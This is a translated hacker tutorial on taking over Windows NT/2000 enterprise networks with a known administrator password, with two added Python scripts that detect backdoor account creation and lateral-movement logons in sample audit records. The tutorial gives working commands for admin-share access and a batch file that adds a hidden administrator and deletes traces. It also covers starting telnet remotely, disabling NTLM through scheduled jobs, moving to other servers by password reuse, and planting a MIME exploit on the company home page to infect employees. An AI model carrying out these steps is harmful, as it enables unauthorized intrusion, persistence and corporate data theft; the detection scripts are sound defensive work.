iceblood
Enterprises today generally run NT systems, and it has to be admitted that NT really is an operating system well suited to enterprise use; yet "hacker" attacks have brought a crisis in enterprise information security...
Someone reading this title may say: "Once you have NT admin, what else is there to say? You can do whatever you want." But what exactly can you do? I'm afraid not many could answer in detail, and many enterprise system administrators think a blank password is no big deal, because they simply have no idea what a "hacker" would do. This article describes the basic and intermediate methods for intruding into an enterprise's computers once the NT Admin password has been obtained. In a large enterprise especially, the system administrator's password often decides whether the whole company's information leaks and whether its data is lost, which seriously affects the enterprise's development and survival.
First, let us assume we have obtained the administrator password of one of the enterprise's servers, 192.168.0.1, and that the other side has not closed port 139.
1. Intrusion via ordinary shared resources
This is probably the simplest NT intrusion there is. In the address bar of any window on your own machine, type "\\192.168.0.1" and wait about 1-2 seconds; the other side will ask for a user name and password. Enter the ones you obtained and you are in, and you can see this server's shared resources within the enterprise. Since the permissions are admin, you can delete almost anything in the other side's shares. (If the shares are set to read-only, there is nothing you can do.)
2. Intrusion via default and hidden shares
Before describing this intrusion method, let me first introduce NT's IPC$ connection. By default an NT system has a special hidden share, the IPC$ share. IPC$ is a kind of named-pipe communication used specifically in NT; most communication between NT systems is carried out over IPC$.
This method is a little more sophisticated, but still very simple; the key is how the "hacker" uses it. Some people can only delete a few files, while others can use it to leave a backdoor, so that next time, if the password has been changed, they can get in through the backdoor. Again open any window on your machine and type "\\192.168.0.1" in the address bar; you will be asked for a password, and after entering it you see the same things as described above. Good, now an IPC$ connection has been established as well; in fact the prompt window that asks for your password already tells you that an IPC$ connection is being made. Then type an address in the address bar again, this time slightly different: "\\192.168.0.1\c$". After a moment the entire contents of the other side's C drive appear. Heh heh! Want to see their D drive? Likewise, type "\\192.168.0.1\D$" and you see the D drive. Replacing the enterprise's home page (if the target is also a web server) is then trivial; remember that with administrator permissions you can of course write. Whether to leave a backdoor is up to the "hacker". Usually they will create a batch file on the C drive (say under c:\winnt), call it hack.bat, with contents generally like this:
net user hack 1234 /add   * creates a user named hack with password 1234 *
net localgroup administrators hack /add   * makes hack an administrator too *
del "C:\Documents and Settings\administrator\「开始」菜单\程序\启动\hack.lnk"   * deletes the shortcut in the Startup folder (the Start Menu\Programs\Startup path of a Chinese-localized Windows; the path is quoted because it contains spaces) to cover tracks *
del c:\winnt\hack.bat   * deletes the hack.bat file itself to cover tracks *
This way, the next time the enterprise system administrator logs on, a user is quietly added. Of course, adding a user is a rather clumsy way of leaving a "backdoor", so in practice many "hackers" will drop a small memory-resident program and create a similar batch file and shortcut; then the "hacker" can basically hold this host in the enterprise for the long term.
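The sequence the batch file above performs (create an account, then put it in Administrators) is exactly what a defender can correlate in the Security audit log. The following is an added example, not part of iceblood's article: it runs that correlation over constructed audit records, using the NT/2000 event IDs 624 and 636 (and the later 4720/4732); the host and account names are hypothetical.

```python
"""Detect the 'add a user, then make it an administrator' persistence pattern.

Added example (not from the original article). It scans constructed Windows
Security audit records for a local account that is created and then added to
the local Administrators group within a short window, the sequence hack.bat
performs. Event IDs: 624 = user account created and 636 = member added to a
security-enabled local group (NT4/2000), plus their later equivalents
4720 / 4732. The records are simplified dicts, not real log exports.
"""
from datetime import datetime, timedelta

ACCOUNT_CREATED = {624, 4720}
LOCAL_GROUP_MEMBER_ADDED = {636, 4732}
ADMIN_GROUPS = {"administrators"}

# Constructed sample records (hypothetical host, times and account names).
SAMPLE_EVENTS = [
    {"time": "2001-10-12 08:00:05", "id": 624, "host": "SRV1", "target": "hack", "group": None},
    {"time": "2001-10-12 08:00:06", "id": 636, "host": "SRV1", "target": "hack", "group": "Administrators"},
    {"time": "2001-10-12 09:15:00", "id": 624, "host": "SRV1", "target": "jsmith", "group": None},
    {"time": "2001-10-12 09:16:00", "id": 636, "host": "SRV1", "target": "jsmith", "group": "Users"},
    {"time": "2001-10-14 10:00:00", "id": 636, "host": "SRV1", "target": "jsmith", "group": "Administrators"},
]

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def find_fast_admin_backdoors(events, window=timedelta(minutes=10)):
    """Return (host, account) pairs created and made admin within `window`.

    Two passes: remember when each account was created on each host, then
    flag admin-group additions that follow that creation quickly. jsmith is
    created and promoted two days apart, so it is not flagged by default.
    """
    ordered = sorted(events, key=lambda e: _ts(e["time"]))
    created = {}
    for e in ordered:
        if e["id"] in ACCOUNT_CREATED:
            created[(e["host"], e["target"].lower())] = _ts(e["time"])
    hits = []
    for e in ordered:
        if e["id"] not in LOCAL_GROUP_MEMBER_ADDED:
            continue
        if (e["group"] or "").lower() not in ADMIN_GROUPS:
            continue
        t0 = created.get((e["host"], e["target"].lower()))
        if t0 is not None and timedelta(0) <= _ts(e["time"]) - t0 <= window:
            hits.append((e["host"], e["target"]))
    return hits

if __name__ == "__main__":
    print(find_fast_admin_backdoors(SAMPLE_EVENTS))  # [('SRV1', 'hack')]
```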
3. Advanced techniques for IPC$ connection intrusion
But no "hacker" is going to be that dumb, waiting until the enterprise system administrator next logs on before taking over; usually a "hacker" uses more ingenious techniques to leave a backdoor quickly. First they still establish the IPC$ connection; after connecting they use all sorts of methods to open a backdoor, for example starting the telnet service. How does a "hacker" start the telnet service? There are many ways. For instance Microsoft itself released a small program (netsvc.exe), a management tool meant specifically to let system administrators start services remotely after establishing an IPC$ connection, but in the hands of a "hacker" this tool naturally becomes an indispensable "hacker" tool as well. At the command prompt type "netsvc \\192.168.0.1 telnet /start"; after about 5 minutes the other side's telnet service is up. Then "telnet 192.168.0.1" heh heh... wait! It requires NTLM authentication, which again keeps the "hacker" out. So they use another small program, one that specifically turns off NTLM authentication, ntlm.exe (it may of course go by other names). "copy ntlm.exe \\192.168.0.1\admin$\system32" copies ntlm.exe into the system32 directory of the enterprise server. It's copied over, but how to make it run? There are plenty of ways. "net time \\192.168.0.1" shows the other side's system time; assume it is 18:00.
Now type "at \\192.168.0.1 18:02 ntlm.exe"; after a moment the command prompt reports the new job added with ID = 0, meaning the other system will run ntlm.exe at 18:02. After 18:02, "telnet 192.168.0.1" again, heh heh~ this time it prompts for a user name and password. Enter the administrator user name and password you obtained and you have successfully telnetted into the enterprise server... But all this netsvc here and at there is really a hassle, so here is another method. First, again, thanks to Microsoft for the convenient management features provided for NT system administrators; in a "hacker's" hands this feature is a "hacker's" godsend, sparing them the trouble of typing all those commands. Once the IPC$ connection is established (IPC$ really is an extremely powerful management connection), open "Computer Management" on your local computer, right-click "Computer Management (Local)" in the Computer Management window, and there is "Connect to another computer". Select it, enter "192.168.0.1" under "Name" and confirm. Your NT system first checks whether an IPC$ connection exists; if so, it connects, and now you can manage 192.168.0.1 directly: view its logs, start its services (including telnet, of course), manage its IIS, everything.
Dig a little deeper and you can even log off the user currently logged on to the other system, restart the other computer, shut it down; it really is powerful. In a "hacker's" hands the NT system itself becomes a "hacker" tool, and a very powerful one. Telnet is started, but what about NTLM authentication? Simple: on the local computer create a user with the same user name and password (if one exists, change its password to match), log on locally again as that user, then "telnet 192.168.0.1" heh heh~ no password needs to be entered at all, because NTLM authentication passed.
Having read the above, do those enterprise system administrators with poor security awareness now understand the danger of exposing the administrator password? It's not over yet. Still not over at this point? The machine is already completely under the "hacker's" control~ Yes, it's not over; read on!
4. Going deeper
This step requires the "hacker" to have rich experience and strong hands-on skills; it can no longer be described clearly in words, so below is only a rough sketch.
Of course the "hacker" will not stop as soon as one server has been compromised; he will push deeper into your internal network. In an enterprise especially, there is usually a whole group of computers, and industrial-espionage "hackers" naturally want to get inside the enterprise all the more. Many enterprise system administrators like to set the same password on all servers, which gives the "hacker" ideal intrusion conditions. After telnetting to the server, type "net view" and every computer in the whole workgroup or domain is laid bare. Then, within telnet, establish an IPC$ connection and intrude exactly as with this server. The IPC$ connections described earlier were all made through the graphical interface, but now there is no graphical interface. Suppose the password of 192.168.0.2 on the internal network is the same as this server's; then "net use \\192.168.0.2\IPC$ "passwd" /user:username" establishes the IPC$ connection, followed by mapping a drive: "net use z: \\192.168.0.2\c$" maps 192.168.0.2's C drive to drive Z on 192.168.0.1. Type "z:" and you can browse 192.168.0.2's C drive just as you browse 192.168.0.1's hard disk. And if he is an industrial-espionage "hacker", once he finds something valuable there, it goes without saying what happens next.
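The password-reuse scenario above leaves a distinctive trace: one account producing network logons on several servers from a single source within minutes. As an added example (not from the original article), the following script looks for that fan-out in constructed logon records; the event IDs 540 (Win2000 successful network logon) and 4624 with logon type 3 (later Windows) are real audit IDs, while the hosts, times and accounts are hypothetical.

```python
"""Flag one account logging on over the network to many hosts in a short time.

Added example (not from the original article). Each "net use \\host\IPC$ ..."
made with a reused administrator password produces a successful network logon
record on the target host. A collector that sees one account fan out from one
source to several hosts within minutes has a strong lateral-movement signal.
Event IDs: 540 (Win2000 "Successful Network Logon") and 4624 with logon
type 3 (later Windows). The records below are constructed dicts.
"""
from collections import defaultdict
from datetime import datetime, timedelta

NETWORK_LOGON_IDS = {540, 4624}
NETWORK_LOGON_TYPE = 3  # type 2 is an interactive console logon, not an IPC$ connection

# Constructed sample records (hypothetical hosts, times and accounts).
SAMPLE_LOGONS = [
    {"time": "2001-10-12 18:10:00", "id": 540,  "type": 3, "host": "192.168.0.2", "account": "administrator", "source": "192.168.0.1"},
    {"time": "2001-10-12 18:12:00", "id": 540,  "type": 3, "host": "192.168.0.3", "account": "administrator", "source": "192.168.0.1"},
    {"time": "2001-10-12 18:14:00", "id": 4624, "type": 3, "host": "192.168.0.4", "account": "Administrator", "source": "192.168.0.1"},
    {"time": "2001-10-12 18:40:00", "id": 4624, "type": 3, "host": "192.168.0.5", "account": "administrator", "source": "192.168.0.1"},
    {"time": "2001-10-12 18:11:00", "id": 4624, "type": 2, "host": "192.168.0.6", "account": "administrator", "source": "192.168.0.1"},
    {"time": "2001-10-13 02:00:00", "id": 540,  "type": 3, "host": "192.168.0.2", "account": "backupsvc", "source": "192.168.0.9"},
    {"time": "2001-10-13 02:05:00", "id": 540,  "type": 3, "host": "192.168.0.3", "account": "backupsvc", "source": "192.168.0.9"},
]

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def find_fanout(logons, min_hosts=3, window=timedelta(minutes=15)):
    """Return (account, source, hosts) for every account/source pair that
    reached at least `min_hosts` distinct hosts inside one sliding `window`.
    Only network logons count; the backupsvc pair touches two hosts and the
    type-2 logon is ignored, so only the administrator fan-out is reported."""
    by_pair = defaultdict(list)
    for e in logons:
        if e["id"] in NETWORK_LOGON_IDS and e["type"] == NETWORK_LOGON_TYPE:
            by_pair[(e["account"].lower(), e["source"])].append((_ts(e["time"]), e["host"]))
    alerts = []
    for (account, source), seq in sorted(by_pair.items()):
        seq.sort()
        for i, (t0, _) in enumerate(seq):
            hosts = {h for t, h in seq[i:] if t - t0 <= window}
            if len(hosts) >= min_hosts:
                alerts.append((account, source, sorted(hosts)))
                break  # one alert per account/source pair is enough
    return alerts

if __name__ == "__main__":
    print(find_fanout(SAMPLE_LOGONS))
```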
Of course that is about the best case; a fair number of enterprise system administrators do not set the same password everywhere. Then it depends on the network. If the machine intruded on happens to be a primary domain controller, heh heh, that is a joy for the industrial spy: quickly promote yourself to domain administrator and every machine in that enterprise domain falls into his hands. That too counts as a very good situation for the "hacker", but Microsoft now has more and more vulnerabilities of every kind, and the "hacker's" experience decides how much opportunity there is to intrude into the internal network. In an enterprise the machine directly connected to the Internet is usually the web server, and a patient "hacker", an industrial spy who wants to intrude into this enterprise, will of course use any means. One technique is to use the web service: the MIME vulnerability Microsoft had this year is very useful. Briefly, the MIME vulnerability: there is a problem in how IE handles abnormal MIME types; an attacker can create an HTML e-mail containing an executable attachment and modify the MIME header so that IE mishandles the MIME and executes the specified executable attachment. For details see badboy's "Attacking with Incorrect MIME Headers", available on our site.
With this vulnerability the "hacker" replaces the web server's home page, inserting the MIME exploit code into the HTML so that employees inside the enterprise run the specified program when they browse their own company's home page. (It is absolutely impossible for people inside the enterprise never to look at their own home page, especially the people in charge, who generally check it from time to time.) So when they browse their own home page they silently execute the program the "hacker" specified, which may be a Trojan or, again, a batch file that adds a user.
From the above one can see how dangerous a leaked NT system password is, especially in an enterprise; whether the topology of the enterprise network is sensible also plays a very important role. And the techniques used by "hackers", industrial spies especially, go far beyond these; they can use other means as well. For example, installing a sniffer to monitor data transfers and their content across the whole enterprise leaks enterprise information badly. Others include sending Trojans by e-mail, or MIME attack syntax, and various other routes to obtain sensitive or confidential information from inside the enterprise.
5. Other intrusions
What is mentioned here is not unimportant; it supplements things not covered above, plus some equally simple techniques. One can also intrude via port 3389, the port of the graphical remote administration service built into Win2000; once a "hacker" has the administrator password, the danger is even more direct. Another is intrusion through IIS administration: by default IIS provides a web-based administration service, something called iisstar.asp under c:\inetpub\wwwroot; if it is reachable and one has the administrator password (on NT4 it need not even be an administrator, any valid NT account will do), IIS can be administered remotely over the web, then by special means the whole machine is taken over, and then the whole enterprise...
Statement: this article is of a somewhat offensive nature; its contents may not be used for intrusion experiments against any network or for illegal acts, and anyone who does so bears the consequences. This article is original work by iceblood; the copyright belongs to the author, and it may not be reproduced without permission. Author E-Mail: iceblood@yeah.net; please contact the author before reproducing.